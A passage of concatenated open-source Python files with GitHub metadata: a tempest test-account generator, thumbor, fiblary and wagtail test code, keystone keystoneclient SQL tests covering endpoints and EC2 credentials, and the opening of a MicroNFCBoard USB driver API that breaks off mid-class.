        # Router uplinked to the configured public (external) network.
        external_net_id = dict(
            network_id=CONF.network.public_network_id)
        resp_body = network_admin_client.create_router(
            router_name,
            external_gateway_info=external_net_id,
            tenant_id=tenant_id)
        return resp_body['router']
    def _add_router_interface(router_id, subnet_id):
        network_admin_client.add_router_interface_with_subnet_id(
            router_id, subnet_id)
    network_name = name + "-network"
    network = _create_network(network_name)
    subnet_name = name + "-subnet"
    subnet = _create_subnet(subnet_name, network['id'])
    router_name = name + "-router"
    router = _create_router(router_name)
    _add_router_interface(router['id'], subnet['id'])
    return network_name, router_name
def random_user_name(tag, prefix):
    """Return a randomised user name based on *prefix*, prepending *tag* if set."""
    base = '-'.join((tag, prefix)) if tag else prefix
    return data_utils.rand_name(base)
def generate_resources(opts):
    """Build the tenant/user specification for ``opts.concurrency`` threads.

    Returns a dict with 'tenants' (list of tenant names) and 'users' (list
    of user dicts carrying tenant, name, pass, prefix and roles).  Each user
    gets a dedicated tenant named '<user>-tenant'.
    """
    # Base spec: one primary and one alt user per concurrency slot.
    spec = [{'number': 1,
             'prefix': 'primary',
             'roles': (CONF.auth.tempest_roles +
                       [CONF.object_storage.operator_role])},
            {'number': 1,
             'prefix': 'alt',
             'roles': (CONF.auth.tempest_roles +
                       [CONF.object_storage.operator_role])}]
    # Service-specific accounts are only generated when the service is
    # reported as available in the tempest config.
    if CONF.service_available.swift:
        spec.append({'number': 1,
                     'prefix': 'swift_operator',
                     'roles': (CONF.auth.tempest_roles +
                               [CONF.object_storage.operator_role])})
        spec.append({'number': 1,
                     'prefix': 'swift_reseller_admin',
                     'roles': (CONF.auth.tempest_roles +
                               [CONF.object_storage.reseller_admin_role])})
    if CONF.service_available.heat:
        spec.append({'number': 1,
                     'prefix': 'stack_owner',
                     'roles': (CONF.auth.tempest_roles +
                               [CONF.orchestration.stack_owner_role])})
    if opts.admin:
        spec.append({
            'number': 1,
            'prefix': 'admin',
            'roles': (CONF.auth.tempest_roles +
                      [CONF.identity.admin_role])
        })
    resources = {'tenants': [],
                 'users': []}
    # Repeat the whole spec once per concurrency slot, drawing random names.
    for count in range(opts.concurrency):
        for user_group in spec:
            users = [random_user_name(opts.tag, user_group['prefix'])
                     for _ in range(user_group['number'])]
            for user in users:
                tenant = '-'.join((user, 'tenant'))
                resources['tenants'].append(tenant)
                resources['users'].append({
                    'tenant': tenant,
                    'name': user,
                    'pass': data_utils.rand_name(),
                    'prefix': user_group['prefix'],
                    'roles': user_group['roles']
                })
    return resources
def dump_accounts(opts, resources):
    """Write the created users to the YAML accounts file given by
    ``opts.accounts``.

    A pre-existing accounts file is preserved as '<name>.bak'.
    """
    accounts = []
    for user in resources['users']:
        account = {
            'username': user['name'],
            'tenant_name': user['tenant'],
            'password': user['pass'],
            'roles': user['roles']
        }
        # Bug fix: the original condition was `'network' or 'router' in user`,
        # which is always true (the non-empty string 'network' is truthy), so
        # every account got a 'resources' dict even when empty.  Now the dict
        # is only emitted when there is something to put in it.
        if 'network' in user or 'router' in user:
            account['resources'] = {}
        if 'network' in user:
            account['resources']['network'] = user['network']
        if 'router' in user:
            account['resources']['router'] = user['router']
        accounts.append(account)
    if os.path.exists(opts.accounts):
        os.rename(opts.accounts, '.'.join((opts.accounts, 'bak')))
    with open(opts.accounts, 'w') as f:
        yaml.dump(accounts, f, default_flow_style=False)
    LOG.info('%s generated successfully!' % opts.accounts)
def get_options():
    """Parse command-line options for the account generator.

    Builds the argparse parser, parses ``sys.argv`` and, if a tempest
    config file was given, points the global config at it.

    :returns: the parsed ``argparse.Namespace``
    """
    usage_string = ('tempest-account-generator [-h] <ARG> ...\n\n'
                    'To see help on specific argument, do:\n'
                    'tempest-account-generator <ARG> -h')
    parser = argparse.ArgumentParser(
        description='Create accounts.yaml file for concurrent test runs. '
                    'One primary user, one alt user, '
                    'one swift admin, one stack owner '
                    'and one admin (optionally) will be created '
                    'for each concurrent thread.',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        usage=usage_string
    )
    parser.add_argument('-c', '--config-file',
                        metavar='/etc/tempest.conf',
                        help='path to tempest config file')
    # Credentials default to the standard OS_* environment variables.
    parser.add_argument('--os-username',
                        metavar='<auth-user-name>',
                        default=os.environ.get('OS_USERNAME'),
                        help='User should have permissions '
                             'to create new user accounts and '
                             'tenants. Defaults to env[OS_USERNAME].')
    parser.add_argument('--os-password',
                        metavar='<auth-password>',
                        default=os.environ.get('OS_PASSWORD'),
                        help='Defaults to env[OS_PASSWORD].')
    parser.add_argument('--os-tenant-name',
                        metavar='<auth-tenant-name>',
                        default=os.environ.get('OS_TENANT_NAME'),
                        help='Defaults to env[OS_TENANT_NAME].')
    parser.add_argument('--tag',
                        default='',
                        required=False,
                        dest='tag',
                        help='Resources tag')
    parser.add_argument('-r', '--concurrency',
                        default=1,
                        type=int,
                        required=True,
                        dest='concurrency',
                        help='Concurrency count')
    parser.add_argument('--with-admin',
                        action='store_true',
                        dest='admin',
                        help='Creates admin for each concurrent group')
    # Positional argument: path of the accounts YAML file to write.
    parser.add_argument('accounts',
                        metavar='accounts_file.yaml',
                        help='Output accounts yaml file')

    opts = parser.parse_args()
    if opts.config_file:
        # Make the global tempest CONF read the user-supplied file.
        config.CONF.set_config_path(opts.config_file)
    return opts
def main(opts=None):
    """Entry point: parse options, create resources, write accounts file.

    :param opts: pre-parsed options; when omitted they are read from the
                 command line via ``get_options``.
    """
    opts = opts or get_options()
    setup_logging()
    resources = generate_resources(opts)
    create_resources(opts, resources)
    dump_accounts(opts, resources)
# Allow direct invocation as a standalone script.
if __name__ == "__main__":
    main()
|
{
"content_hash": "2c99351391e5ec304f038a2d69b91432",
"timestamp": "",
"source": "github",
"line_count": 400,
"max_line_length": 79,
"avg_line_length": 39.205,
"alnum_prop": 0.5630659354674149,
"repo_name": "rakeshmi/tempest",
"id": "ce7728e68a4a21f59b54d75ad6fc201ac65a0b5e",
"size": "16306",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tempest/cmd/account_generator.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2867452"
},
{
"name": "Shell",
"bytes": "8578"
}
],
"symlink_target": ""
}
|
from pyvows import Vows, expect
from thumbor.handlers import BaseHandler
from thumbor.context import Context
from thumbor.config import Config
from thumbor.app import ThumborServiceApp
from mock import MagicMock
@Vows.batch
class BaseHandlerVows(Vows.Context):
    """Vows for thumbor's BaseHandler response-header behaviour."""

    class ShouldStoreHeaderOnContext(Vows.Context):
        def topic(self):
            # Build a BaseHandler wired to a minimal ThumborServiceApp;
            # the request side is fully mocked.
            context = Context(None, Config(), None)
            app = ThumborServiceApp(context)
            handler = BaseHandler(app, MagicMock())
            handler._transforms = []
            return handler

        def should_be_ThumborServiceApp(self, topic):
            fake_context = MagicMock(**{'config.MAX_AGE_TEMP_IMAGE': 30})
            topic._write_results_to_client(fake_context, '', 'image/jpeg')
            # Writing results must stamp the standard cache/identity headers.
            for header in ('Expires', 'Server', 'Cache-Control'):
                expect(fake_context.headers).to_include(header)
            expect(fake_context.headers['Content-Type']).to_equal('image/jpeg')
|
{
"content_hash": "2bba3ac462bb692df13d60ba12e838fc",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 81,
"avg_line_length": 39,
"alnum_prop": 0.6752136752136753,
"repo_name": "camargoanderso/thumbor",
"id": "5205d3956051ada74e63881ade8f0bc4296ae1a3",
"size": "1305",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vows/base_handler_vows.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "57904"
},
{
"name": "HTML",
"bytes": "1737"
},
{
"name": "JavaScript",
"bytes": "409"
},
{
"name": "Makefile",
"bytes": "1991"
},
{
"name": "Python",
"bytes": "567726"
}
],
"symlink_target": ""
}
|
"""Test rest module"""
import operator
from fiblary.common import event
from fiblary.common import exceptions
from fiblary.tests import utils
event_name = "event_1"
def fake_handler():
    """No-op callable used as a registration target in the hook tests."""
class TestEventHook(utils.TestCase):
    """Unit tests for ``event.EventHook``."""

    def setUp(self):
        super(TestEventHook, self).setUp()
        self.event_hook = event.EventHook(event_name)

    def test_init(self):
        """The hook's repr is its event name."""
        self.assertEqual(repr(self.event_hook), event_name)

    def test_add_remove_event(self):
        """Adding/removing handlers updates the count and the queue."""
        self.assertEqual(
            self.event_hook.get_handler_count(),
            0,
            "Incorrect initial number of handlers")
        self.assertEqual(
            self.event_hook.event_queue,
            None,
            # Fixed message grammar ("should not initialized").
            "Event queue should not be initialized")
        # ``+=`` registers a handler and lazily creates the queue.
        self.event_hook += fake_handler
        self.assertEqual(
            self.event_hook.get_handler_count(),
            1,
            # Fixed typo in the original message ("Incorect").
            "Incorrect number of handlers")
        self.assertEqual(
            type(self.event_hook.event_queue),
            event.EventQueue,
            "Queue should be initialized with EventQueue")
        # ``-=`` deregisters the handler again.
        self.event_hook -= fake_handler
        self.assertEqual(
            self.event_hook.get_handler_count(),
            0,
            "Incorrect number of event handlers after subtraction")
        # Removing a handler that was never registered raises.
        self.assertRaises(
            exceptions.HandlerNotFound,
            operator.isub,
            self.event_hook,
            fake_handler)
|
{
"content_hash": "fc635ab5188d2d5d7c1ed71bfeaf02d6",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 67,
"avg_line_length": 24.253968253968253,
"alnum_prop": 0.5922774869109948,
"repo_name": "kstaniek/fiblary",
"id": "cb4359ff96d83a95e6d17dfb52e311ff4902b027",
"size": "2102",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fiblary/tests/unit/test_event.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "6771"
},
{
"name": "Python",
"bytes": "105397"
},
{
"name": "Shell",
"bytes": "6703"
}
],
"symlink_target": ""
}
|
from django.http import HttpResponseForbidden
from django.utils.deprecation import MiddlewareMixin
class BlockDodgyUserAgentMiddleware(MiddlewareMixin):
    # Used to test that we're correctly handling responses returned from
    # middleware during page previews. If a client with user agent
    # "EvilHacker" calls an admin view that performs a preview, the request
    # to /admin/... will pass this middleware, but the fake request used for
    # the preview (which keeps the user agent header, but uses the URL path
    # of the front-end page) will trigger a Forbidden response. In this
    # case, the expected behaviour is to return that response back to the
    # user.
    def process_request(self, request):
        dodgy_agent = request.META.get("HTTP_USER_AGENT") == "EvilHacker"
        admin_request = request.path.startswith("/admin/")
        if dodgy_agent and not admin_request:
            return HttpResponseForbidden("Forbidden")
|
{
"content_hash": "657702c05f6a7e20cc7ad5be024d26e6",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 98,
"avg_line_length": 50.44444444444444,
"alnum_prop": 0.7191629955947136,
"repo_name": "zerolab/wagtail",
"id": "cb6521edd3ce25a7ca9afe26831882ecd6965e20",
"size": "908",
"binary": false,
"copies": "4",
"ref": "refs/heads/main",
"path": "wagtail/test/middleware.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2522"
},
{
"name": "Dockerfile",
"bytes": "2041"
},
{
"name": "HTML",
"bytes": "593037"
},
{
"name": "JavaScript",
"bytes": "615631"
},
{
"name": "Makefile",
"bytes": "1413"
},
{
"name": "Python",
"bytes": "6560334"
},
{
"name": "SCSS",
"bytes": "219204"
},
{
"name": "Shell",
"bytes": "6845"
},
{
"name": "TypeScript",
"bytes": "288102"
}
],
"symlink_target": ""
}
|
import os
import uuid
from keystoneclient.contrib.ec2 import utils as ec2_utils
from keystone import tests
from keystone.tests import test_keystoneclient
class KcMasterSqlTestCase(test_keystoneclient.KcMasterTestCase):
    """Run the master keystoneclient test suite against the SQL backend.

    Extends the inherited client tests with endpoint, EC2-credential and
    policy CRUD coverage; the SQL backend is selected by appending
    ``backend_sql.conf`` to the config file list.
    """

    def config_files(self):
        # Layer the SQL backend configuration on top of the base configs.
        config_files = super(KcMasterSqlTestCase, self).config_files()
        config_files.append(tests.dirs.tests_conf('backend_sql.conf'))
        return config_files

    def setUp(self):
        super(KcMasterSqlTestCase, self).setUp()
        # Cache a non-admin client for the default user; the attribute is
        # removed again by the registered cleanup after each test.
        self.default_client = self.get_client()
        self.addCleanup(self.cleanup_instance('default_client'))

    def test_endpoint_crud(self):
        """Endpoints can be created against a service and deleted again."""
        from keystoneclient import exceptions as client_exceptions

        client = self.get_client(admin=True)
        service = client.services.create(name=uuid.uuid4().hex,
                                         service_type=uuid.uuid4().hex,
                                         description=uuid.uuid4().hex)
        endpoint_region = uuid.uuid4().hex
        invalid_service_id = uuid.uuid4().hex
        endpoint_publicurl = uuid.uuid4().hex
        endpoint_internalurl = uuid.uuid4().hex
        endpoint_adminurl = uuid.uuid4().hex

        # a non-existent service ID should trigger a 404
        self.assertRaises(client_exceptions.NotFound,
                          client.endpoints.create,
                          region=endpoint_region,
                          service_id=invalid_service_id,
                          publicurl=endpoint_publicurl,
                          adminurl=endpoint_adminurl,
                          internalurl=endpoint_internalurl)

        endpoint = client.endpoints.create(region=endpoint_region,
                                           service_id=service.id,
                                           publicurl=endpoint_publicurl,
                                           adminurl=endpoint_adminurl,
                                           internalurl=endpoint_internalurl)
        # The created endpoint must echo back every attribute we set.
        self.assertEqual(endpoint_region, endpoint.region)
        self.assertEqual(service.id, endpoint.service_id)
        self.assertEqual(endpoint_publicurl, endpoint.publicurl)
        self.assertEqual(endpoint_internalurl, endpoint.internalurl)
        self.assertEqual(endpoint_adminurl, endpoint.adminurl)

        client.endpoints.delete(id=endpoint.id)
        # Deleting an already-deleted endpoint must 404.
        self.assertRaises(client_exceptions.NotFound, client.endpoints.delete,
                          id=endpoint.id)

    def _send_ec2_auth_request(self, credentials, client=None):
        # POST the signed EC2 credentials to the ec2tokens endpoint and
        # return the raw (response, token) pair.
        if not client:
            client = self.default_client
        url = '%s/ec2tokens' % self.default_client.auth_url
        (resp, token) = client.request(
            url=url, method='POST',
            body={'credentials': credentials})
        return resp, token

    def _generate_default_user_ec2_credentials(self):
        # Create an EC2 keypair for user_foo in tenant_bar and sign a
        # request with it.
        cred = self. default_client.ec2.create(
            user_id=self.user_foo['id'],
            tenant_id=self.tenant_bar['id'])
        return self._generate_user_ec2_credentials(cred.access, cred.secret)

    def _generate_user_ec2_credentials(self, access, secret):
        # Build an EC2 SigV2-signed request body for the given keypair.
        signer = ec2_utils.Ec2Signer(secret)
        credentials = {'params': {'SignatureVersion': '2'},
                       'access': access,
                       'verb': 'GET',
                       'host': 'localhost',
                       'path': '/service/cloud'}
        signature = signer.generate(credentials)
        return credentials, signature

    def test_ec2_auth_success(self):
        """A correctly signed EC2 request yields a 200 and a token."""
        credentials, signature = self._generate_default_user_ec2_credentials()
        credentials['signature'] = signature
        resp, token = self._send_ec2_auth_request(credentials)
        self.assertEqual(200, resp.status_code)
        self.assertIn('access', token)

    def test_ec2_auth_success_trust(self):
        """EC2 auth works through a trust-scoped (impersonating) client."""
        # Add "other" role user_foo and create trust delegating it to user_two
        self.assignment_api.add_role_to_user_and_project(
            self.user_foo['id'],
            self.tenant_bar['id'],
            self.role_other['id'])
        trust_id = 'atrust123'
        trust = {'trustor_user_id': self.user_foo['id'],
                 'trustee_user_id': self.user_two['id'],
                 'project_id': self.tenant_bar['id'],
                 'impersonation': True}
        roles = [self.role_other]
        self.trust_api.create_trust(trust_id, trust, roles)

        # Create a client for user_two, scoped to the trust
        client = self.get_client(self.user_two)
        ret = client.authenticate(trust_id=trust_id,
                                  tenant_id=self.tenant_bar['id'])
        self.assertTrue(ret)
        self.assertTrue(client.auth_ref.trust_scoped)
        self.assertEqual(trust_id, client.auth_ref.trust_id)

        # Create an ec2 keypair using the trust client impersonating user_foo
        cred = client.ec2.create(user_id=self.user_foo['id'],
                                 tenant_id=self.tenant_bar['id'])
        credentials, signature = self._generate_user_ec2_credentials(
            cred.access, cred.secret)
        credentials['signature'] = signature
        resp, token = self._send_ec2_auth_request(credentials)
        self.assertEqual(200, resp.status_code)
        self.assertEqual(trust_id, token['access']['trust']['id'])
        # TODO(shardy) we really want to check the roles and trustee
        # but because of where the stubbing happens we don't seem to
        # hit the necessary code in controllers.py _authenticate_token
        # so although all is OK via a real request, it incorrect in
        # this test..

    def test_ec2_auth_failure(self):
        """A request with a bogus signature is rejected with 401."""
        from keystoneclient import exceptions as client_exceptions

        credentials, signature = self._generate_default_user_ec2_credentials()
        credentials['signature'] = uuid.uuid4().hex
        self.assertRaises(client_exceptions.Unauthorized,
                          self._send_ec2_auth_request,
                          credentials)

    def test_ec2_credential_crud(self):
        """EC2 credentials can be created, listed, fetched and deleted."""
        creds = self.default_client.ec2.list(user_id=self.user_foo['id'])
        self.assertEqual([], creds)

        cred = self.default_client.ec2.create(user_id=self.user_foo['id'],
                                              tenant_id=self.tenant_bar['id'])
        creds = self.default_client.ec2.list(user_id=self.user_foo['id'])
        self.assertEqual(creds, [cred])
        got = self.default_client.ec2.get(user_id=self.user_foo['id'],
                                          access=cred.access)
        self.assertEqual(cred, got)

        self.default_client.ec2.delete(user_id=self.user_foo['id'],
                                       access=cred.access)
        creds = self.default_client.ec2.list(user_id=self.user_foo['id'])
        self.assertEqual([], creds)

    def test_ec2_credential_crud_non_admin(self):
        """A non-admin user can manage their own EC2 credentials."""
        na_client = self.get_client(self.user_two)
        creds = na_client.ec2.list(user_id=self.user_two['id'])
        self.assertEqual([], creds)

        cred = na_client.ec2.create(user_id=self.user_two['id'],
                                    tenant_id=self.tenant_baz['id'])
        creds = na_client.ec2.list(user_id=self.user_two['id'])
        self.assertEqual(creds, [cred])
        got = na_client.ec2.get(user_id=self.user_two['id'],
                                access=cred.access)
        self.assertEqual(cred, got)

        na_client.ec2.delete(user_id=self.user_two['id'],
                             access=cred.access)
        creds = na_client.ec2.list(user_id=self.user_two['id'])
        self.assertEqual([], creds)

    def test_ec2_list_credentials(self):
        """Listing returns only the requesting user's credentials."""
        cred_1 = self.default_client.ec2.create(
            user_id=self.user_foo['id'],
            tenant_id=self.tenant_bar['id'])
        cred_2 = self.default_client.ec2.create(
            user_id=self.user_foo['id'],
            tenant_id=self.tenant_service['id'])
        cred_3 = self.default_client.ec2.create(
            user_id=self.user_foo['id'],
            tenant_id=self.tenant_mtu['id'])
        two = self.get_client(self.user_two)
        # Credential belonging to a different user; must not show up below.
        cred_4 = two.ec2.create(user_id=self.user_two['id'],
                                tenant_id=self.tenant_bar['id'])
        creds = self.default_client.ec2.list(user_id=self.user_foo['id'])
        self.assertEqual(3, len(creds))
        # Compare sorted by access key since list order is not guaranteed.
        self.assertEqual(sorted([cred_1, cred_2, cred_3],
                                key=lambda x: x.access),
                         sorted(creds, key=lambda x: x.access))
        self.assertNotIn(cred_4, creds)

    def test_ec2_credentials_create_404(self):
        """Creating credentials for unknown user or tenant 404s."""
        from keystoneclient import exceptions as client_exceptions
        self.assertRaises(client_exceptions.NotFound,
                          self.default_client.ec2.create,
                          user_id=uuid.uuid4().hex,
                          tenant_id=self.tenant_bar['id'])
        self.assertRaises(client_exceptions.NotFound,
                          self.default_client.ec2.create,
                          user_id=self.user_foo['id'],
                          tenant_id=uuid.uuid4().hex)

    def test_ec2_credentials_delete_404(self):
        """Deleting a non-existent credential 404s."""
        from keystoneclient import exceptions as client_exceptions

        self.assertRaises(client_exceptions.NotFound,
                          self.default_client.ec2.delete,
                          user_id=uuid.uuid4().hex,
                          access=uuid.uuid4().hex)

    def test_ec2_credentials_get_404(self):
        """Fetching a non-existent credential 404s."""
        from keystoneclient import exceptions as client_exceptions

        self.assertRaises(client_exceptions.NotFound,
                          self.default_client.ec2.get,
                          user_id=uuid.uuid4().hex,
                          access=uuid.uuid4().hex)

    def test_ec2_credentials_list_404(self):
        """Listing credentials for an unknown user 404s."""
        from keystoneclient import exceptions as client_exceptions

        self.assertRaises(client_exceptions.NotFound,
                          self.default_client.ec2.list,
                          user_id=uuid.uuid4().hex)

    def test_ec2_credentials_list_user_forbidden(self):
        """A user may not list another user's credentials."""
        from keystoneclient import exceptions as client_exceptions

        two = self.get_client(self.user_two)
        self.assertRaises(client_exceptions.Forbidden, two.ec2.list,
                          user_id=self.user_foo['id'])

    def test_ec2_credentials_get_user_forbidden(self):
        """A user may not fetch another user's credential."""
        from keystoneclient import exceptions as client_exceptions

        cred = self.default_client.ec2.create(user_id=self.user_foo['id'],
                                              tenant_id=self.tenant_bar['id'])

        two = self.get_client(self.user_two)
        self.assertRaises(client_exceptions.Forbidden, two.ec2.get,
                          user_id=self.user_foo['id'], access=cred.access)

        # Clean up the credential created above.
        self.default_client.ec2.delete(user_id=self.user_foo['id'],
                                       access=cred.access)

    def test_ec2_credentials_delete_user_forbidden(self):
        """A user may not delete another user's credential."""
        from keystoneclient import exceptions as client_exceptions

        cred = self.default_client.ec2.create(user_id=self.user_foo['id'],
                                              tenant_id=self.tenant_bar['id'])

        two = self.get_client(self.user_two)
        self.assertRaises(client_exceptions.Forbidden, two.ec2.delete,
                          user_id=self.user_foo['id'], access=cred.access)

        # Clean up the credential created above.
        self.default_client.ec2.delete(user_id=self.user_foo['id'],
                                       access=cred.access)

    def test_endpoint_create_404(self):
        """Creating an endpoint for an unknown service 404s."""
        from keystoneclient import exceptions as client_exceptions
        client = self.get_client(admin=True)
        self.assertRaises(client_exceptions.NotFound,
                          client.endpoints.create,
                          region=uuid.uuid4().hex,
                          service_id=uuid.uuid4().hex,
                          publicurl=uuid.uuid4().hex,
                          adminurl=uuid.uuid4().hex,
                          internalurl=uuid.uuid4().hex)

    def test_endpoint_delete_404(self):
        """Deleting a non-existent endpoint 404s."""
        from keystoneclient import exceptions as client_exceptions
        client = self.get_client(admin=True)
        self.assertRaises(client_exceptions.NotFound,
                          client.endpoints.delete,
                          id=uuid.uuid4().hex)

    def test_policy_crud(self):
        """Policy CRUD via the (non-existent v2) policy manager."""
        from keystoneclient import exceptions as client_exceptions
        # FIXME(dolph): this test was written prior to the v3 implementation of
        #               the client and essentially refers to a non-existent
        #               policy manager in the v2 client. this test needs to be
        #               moved to a test suite running against the v3 api
        self.skipTest('Written prior to v3 client; needs refactor')
        client = self.get_client(admin=True)

        policy_blob = uuid.uuid4().hex
        policy_type = uuid.uuid4().hex
        service = client.services.create(
            name=uuid.uuid4().hex,
            service_type=uuid.uuid4().hex,
            description=uuid.uuid4().hex)
        endpoint = client.endpoints.create(
            service_id=service.id,
            region=uuid.uuid4().hex,
            adminurl=uuid.uuid4().hex,
            internalurl=uuid.uuid4().hex,
            publicurl=uuid.uuid4().hex)

        # create
        policy = client.policies.create(
            blob=policy_blob,
            type=policy_type,
            endpoint=endpoint.id)
        self.assertEqual(policy_blob, policy.policy)
        self.assertEqual(policy_type, policy.type)
        self.assertEqual(endpoint.id, policy.endpoint_id)

        policy = client.policies.get(policy=policy.id)
        self.assertEqual(policy_blob, policy.policy)
        self.assertEqual(policy_type, policy.type)
        self.assertEqual(endpoint.id, policy.endpoint_id)

        endpoints = [x for x in client.endpoints.list() if x.id == endpoint.id]
        endpoint = endpoints[0]
        self.assertEqual(policy_blob, policy.policy)
        self.assertEqual(policy_type, policy.type)
        self.assertEqual(endpoint.id, policy.endpoint_id)

        # update
        policy_blob = uuid.uuid4().hex
        policy_type = uuid.uuid4().hex
        endpoint = client.endpoints.create(
            service_id=service.id,
            region=uuid.uuid4().hex,
            adminurl=uuid.uuid4().hex,
            internalurl=uuid.uuid4().hex,
            publicurl=uuid.uuid4().hex)

        policy = client.policies.update(
            policy=policy.id,
            blob=policy_blob,
            type=policy_type,
            endpoint=endpoint.id)

        policy = client.policies.get(policy=policy.id)
        self.assertEqual(policy_blob, policy.policy)
        self.assertEqual(policy_type, policy.type)
        self.assertEqual(endpoint.id, policy.endpoint_id)

        # delete
        client.policies.delete(policy=policy.id)
        self.assertRaises(
            client_exceptions.NotFound,
            client.policies.get,
            policy=policy.id)
        policies = [x for x in client.policies.list() if x.id == policy.id]
        self.assertEqual(0, len(policies))
class KcOptTestCase(KcMasterSqlTestCase):
    """Run the SQL test suite against a locally checked-out keystoneclient.

    Skipped entirely unless the environment points at a client checkout.
    """
    # Set KSCTEST_PATH to the keystoneclient directory, then run this test.
    #
    # For example, to test your local keystoneclient,
    #
    # KSCTEST_PATH=/opt/stack/python-keystoneclient \
    #  tox -e py27 test_keystoneclient_sql.KcOptTestCase
    def setUp(self):
        self.checkout_info = os.environ.get('KSCTEST_PATH')
        if not self.checkout_info:
            # NOTE(review): ``self.skip`` looks like the deprecated testtools
            # alias for ``skipTest`` — confirm the base class provides it.
            self.skip('Set KSCTEST_PATH env to test with local client')
        super(KcOptTestCase, self).setUp()
|
{
"content_hash": "b1536550e3764cf6b2ebf23aa5e472cf",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 79,
"avg_line_length": 43.15300546448088,
"alnum_prop": 0.585665442573129,
"repo_name": "rodrigods/keystone",
"id": "fdbd167cf2d97d4019517908e02b3cf9d281d7a4",
"size": "16380",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "keystone/tests/test_keystoneclient_sql.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2971055"
},
{
"name": "Shell",
"bytes": "10635"
}
],
"symlink_target": ""
}
|
"""
MicroNFCBoard Python API
Copyright (c) 2014-2015 AppNearMe Ltd
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from array import array
from interface import INTERFACE, usb_backend
from transport import Transport
from nfc.ndef import URIRecord, TextRecord, SmartPosterRecord, MIMERecord
# USB identifiers used to find the board on the bus.
VID = 0x1FC9 #NXP VID
PID = 0x8039 #Attributed to AppNearMe

# Minimum firmware (major, minor) this API version supports.
TARGET_FIRMWARE = (1, 4)

# Bit flags of the status word returned by Transport.status().
STATUS_POLLING = (1 << 0)
STATUS_CONNECTED = (1 << 1)
STATUS_NDEF_PRESENT = (1 << 2)
STATUS_NDEF_READABLE = (1 << 3)
STATUS_NDEF_WRITEABLE = (1 << 4)
STATUS_NDEF_BUSY = (1 << 5)
STATUS_NDEF_SUCCESS = (1 << 6)

# Connected-tag type is encoded in bits 8-15 of the status word.
STATUS_TYPE_MASK = (0xFF << 8)
STATUS_TYPE1 = (1 << 8)
STATUS_TYPE2 = (2 << 8)
STATUS_TYPE3 = (3 << 8)
STATUS_TYPE4 = (4 << 8)
STATUS_P2P = (8 << 8)

# Bit 16 distinguishes initiator from target mode.
STATUS_INITIATOR = (1 << 16)
STATUS_TARGET = (0 << 16)

# Record data is transferred over USB in chunks of this many bytes.
CHUNK_SIZE = 40

# NDEF text record encoding flag -> Python codec name.
TEXT_ENCODING = {0: "utf-8", 1: "utf-16"}
class SmartPosterNestingException(Exception):
    """Raised when a smart poster record is nested inside another one."""
class FirmwareUpgradeRequiredException(Exception):
    """Raised when the board firmware is older than TARGET_FIRMWARE."""
class MicroNFCBoard(object):
    """High-level driver for a MicroNFCBoard attached over USB.

    Wraps a ``Transport`` for the low-level USB protocol and exposes the
    board's NFC state (polling/connection/NDEF flags) plus NDEF message
    read/write in terms of the ``nfc.ndef`` record classes.
    """

    @staticmethod
    def getBoard(number = 0):
        # Return the number-th connected board, or None if not present.
        a = INTERFACE[usb_backend].getAllConnectedInterface(VID, PID)
        if((a != None) and (len(a) > number)):
            return MicroNFCBoard(a[number])
        return None

    @staticmethod
    def getAllBoards():
        # One MicroNFCBoard instance per connected USB interface.
        return [MicroNFCBoard(i) for i in INTERFACE[usb_backend].getAllConnectedInterface(VID, PID)]

    def __init__(self, intf):
        self._intf = intf
        self._transport = Transport()
        # Board identity, filled in by open().
        self._id = None
        self._version = None
        # Cached status flags, refreshed by _updateStatus().
        self._polling = False
        self._connected = False
        self._type2 = False
        self._type4 = False
        self._p2p = False
        self._initiator = False
        self._ndefPresent = False
        # NDEF message cache; _ndefRead marks whether it is up to date.
        self._ndefRecords = None
        self._ndefRead = False
        self._ndefReadable = False
        self._ndefWriteable = False
        self._ndefBusy = False
        self._ndefSuccess = False

    def open(self):
        """Open the transport and check the board's firmware version.

        Raises FirmwareUpgradeRequiredException when the reported version
        is older than TARGET_FIRMWARE.
        """
        self._transport.open(self._intf)
        version, revision, self._id = self._transport.info()
        self._version = (version, revision)
        if( self._version < TARGET_FIRMWARE ):
            #self._transport.reset(True)
            raise FirmwareUpgradeRequiredException("Your current firmware (version %d.%d) is outdated; please upgrade it to version %d.%d" % (version, revision, TARGET_FIRMWARE[0], TARGET_FIRMWARE[1]))

    def close(self):
        """Close the underlying USB transport."""
        self._transport.close()

    @property
    def id(self):
        # Board identifier reported by the firmware (set by open()).
        return self._id

    @property
    def connected(self):
        self._updateStatus()
        return self._connected

    @property
    def type2Tag(self):
        # True when connected to a type-2 tag as initiator (reader/writer).
        self._updateStatus()
        return self._type2 and self._initiator

    @property
    def type4Emulator(self):
        # True when emulating a type-4 tag (target mode).
        self._updateStatus()
        return self._type4 and not self._initiator

    @property
    def p2p(self):
        self._updateStatus()
        return self._p2p

    @property
    def polling(self):
        self._updateStatus()
        return self._polling

    @property
    def ndefReadable(self):
        self._updateStatus()
        return self._ndefReadable

    @property
    def ndefWriteable(self):
        self._updateStatus()
        return self._ndefWriteable

    @property
    def ndefPresent(self):
        self._updateStatus()
        return self._ndefPresent

    @property
    def ndefBusy(self):
        self._updateStatus()
        return self._ndefBusy

    @property
    def ndefSuccess(self):
        self._updateStatus()
        return self._ndefSuccess

    @property
    def ndefRecords(self):
        # Lazily fetch the NDEF message from the board; the cache is
